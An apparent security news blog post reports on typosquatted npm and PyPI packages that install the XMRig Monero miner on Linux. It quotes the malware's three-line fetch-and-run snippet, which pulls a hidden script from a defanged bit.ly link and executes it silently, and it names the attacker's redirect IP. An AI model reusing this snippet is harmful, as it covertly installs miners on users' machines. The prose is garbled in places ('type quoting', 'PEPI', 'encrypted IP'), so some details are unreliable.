news

Above 200 npm & PyPi Packages dropping Linux crypto miners found by Security Experts

Virus creators keep on creating new viruses day by day and use them to their advantage, in this sequence once again security experts discovered some malware in PyPI and npm repositories, which was very surprising, above 200 npm packages of Key use type quoting that contain crypto-currency miners for Linux operating systems.

npm

Hawke Lubbers, an independent researcher at the Department of Information Security, first noticed this problem and found that “at least 33 packages” are being used on PEPI, and not only that, it is very easy to use the XMRIG miner, Which is also used to easily mine the Monero crypto-currency.

Let me tell you that generally, any developers download any package into the system through the terminal, in which typo is very common, if I understand this thing with example, then malware has copied React, argparse and AIOHTTP. Now let’s understand that the user had downloaded the package by misspelling the name of the original popular package for whatever reason, as I will clarify that type quoting was used to distribute those packages to different locations.

The most surprising thing is that when Hawke Lubers came to know about all these things and was giving information about it to the PEPI administration, at the same time the attacker suddenly displayed his arrogance by using 22 other Malicious packages with the same payload.

Apart from all this, the researcher specifically states that all these malicious packages were targeted specifically on Linux systems and not only that a code fragment was found in all these packages which allowed Bit.ly URL Shortening Web to download Bash script from the servers of these notorious attackers through the service:

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")

So the same Mr. Hawke Lubers has revealed that bit.ly forcibly redirects the URL to 80.78.25[.]140:8000 and then sends this script to its operator, that is, to the attacker, to the encrypted IP of the compromised host and informs about the address as well as the successful deployment of the miner very cleverly.

You can also read:

32 ways to Get Google to Index your Website Quickly in 2022

Cisco was hacked by Yanluowang Ransomware

About the author

Christopher Edwards

Hey This is Chris, I am a Malware researcher and security analyst. I love to find out about new threats and viruses and I started this website to teach people how to stay safe online. You will get all the latest malware removal tips and tricks here. You can also ask for any virus related problem in comment section or through our contact page.

Leave a Comment